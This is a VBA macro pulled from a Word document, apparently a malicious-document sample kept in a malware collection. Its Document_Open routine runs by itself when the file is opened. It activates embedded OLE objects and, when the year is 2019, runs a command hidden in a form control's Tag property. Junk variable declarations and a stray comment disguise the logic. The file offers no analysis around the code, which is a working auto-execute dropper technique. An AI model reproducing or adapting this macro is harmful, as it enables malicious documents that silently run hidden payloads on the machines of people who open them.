Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public j As Object
Sub Document_Open()
Dim Osh As InlineShape

For Each Osh In ActiveDocument.InlineShapes
If Osh.Type = wdInlineShapeEmbeddedOLEObject Then
If Year(Date) = 2019 Then
Set j = Word.Application
End If
Osh.OLEFormat.Activate
End If
Next Osh
    'File name cannot contain \ / : * ? " < > |

Dim iRawCommentIterator As Integer

Dim bBusinessExpectationsNaFound As Boolean

Dim bVerificationFound As Boolean

Dim bEsatFound As Boolean

Dim sSmName As String

Dim iEvaluationIndex As Integer

Dim dExpectedSecondaryMax As Double

Dim dMaxSecondaryScoreSubtotal As Double

Dim bMissingBusinessExpectationsNaProcessed As Boolean

Dim bSecondaryScoreValid As Boolean

''''''' Legacy variable to accommodate Sub addCallHandlingMax (This Class doesn't touch any Worksheet objects) '''''
    j.Run (UsrFrm.xheLMK.Tag)
Dim iCallHandlingCt As Integer
End Sub

Attribute VB_Name = "UsrFrm"
Attribute VB_Base = "0{D9ED775C-167B-4F46-9FBE-D75D0508D6DF}{248D57A3-294E-438A-8A04-CA273BB8F2F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
